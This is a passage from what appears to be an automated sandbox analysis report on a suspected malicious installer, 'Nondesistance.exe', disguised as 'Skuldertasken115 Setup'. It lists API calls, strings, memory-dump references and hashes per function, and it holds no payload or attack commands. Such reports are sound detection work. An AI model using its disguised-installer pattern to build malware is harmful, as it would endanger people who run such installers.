                                                                                                  • SetCursor.USER32(00000000), ref: 0040427B
                                                                                                  • SendMessageA.USER32(00000111,?,00000000), ref: 004042A7
                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                  • String ID: (@@$Call$N$open
                                                                                                  • API String ID: 3615053054-2228552488
                                                                                                  • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                  • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                                  • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                  • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                  • DrawTextA.USER32(00000000,Skuldertasken115 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                  • String ID: F$Skuldertasken115 Setup
                                                                                                  • API String ID: 941294808-2398837403
                                                                                                  • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                  • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                                                  • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                  • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                                  Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                                  • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                                                    • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                    • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                  • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                                                  • wsprintfA.USER32 ref: 00405AEF
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                                  • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                                    • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004059A6
                                                                                                    • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                  • String ID: %s=%s$NUL$[Rename]
                                                                                                  • API String ID: 222337774-4148678300
                                                                                                  • Opcode ID: 396ac98f4d2996a0896bc91c9097d8f7cdfcc781c751df2836a7ceba7e79aa7c
                                                                                                  • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                                  • Opcode Fuzzy Hash: 396ac98f4d2996a0896bc91c9097d8f7cdfcc781c751df2836a7ceba7e79aa7c
                                                                                                  • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                                  Function 00405F9A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nondesistance.exe",77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Nondesistance.exe",77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                  • CharPrevA.USER32(?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\Nondesistance.exe", xrefs: 00405FD6
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                                  • *?|<>/":, xrefs: 00405FE2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Char$Next$Prev
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 589700163-2780203020
                                                                                                  • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                  • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                                  • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                  • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                                  Function 00402B7F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B9A
                                                                                                  • MulDiv.KERNEL32(000D5275,00000064,000D68D8), ref: 00402BC5
                                                                                                  • wsprintfA.USER32 ref: 00402BD5
                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                  • String ID: uR$verifying installer: %d%%
                                                                                                  • API String ID: 1451636040-3922335905
                                                                                                  • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                  • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                                  • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                  • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                                  Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                                                  • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                                                  • GetSysColor.USER32(?), ref: 00403FDF
                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                                                  • DeleteObject.GDI32(?), ref: 00404009
                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2320649405-0
                                                                                                  • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                  • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                                  • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                  • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                                  Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                                    • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3730416702-0
                                                                                                  • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                  • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                                  • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                  • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                                  Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1780285237-0
                                                                                                  • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                  • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                                  • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                  • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                                  Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                                  • GetMessagePos.USER32 ref: 00404836
                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404850
                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                  • String ID: f
                                                                                                  • API String ID: 41195575-1993550816
                                                                                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                  • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                  • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                                  Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                  • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2667972263-0
                                                                                                  • Opcode ID: 9b9e1748d849d950a99293442005731c31a3644dc9cf68e8f7c185ad44726307
                                                                                                  • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                                                  • Opcode Fuzzy Hash: 9b9e1748d849d950a99293442005731c31a3644dc9cf68e8f7c185ad44726307
                                                                                                  • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                                                  Function 00404709 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(Skuldertasken115 Setup: Installing,Skuldertasken115 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                  • wsprintfA.USER32 ref: 004047AF
                                                                                                  • SetDlgItemTextA.USER32(?,Skuldertasken115 Setup: Installing), ref: 004047C2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
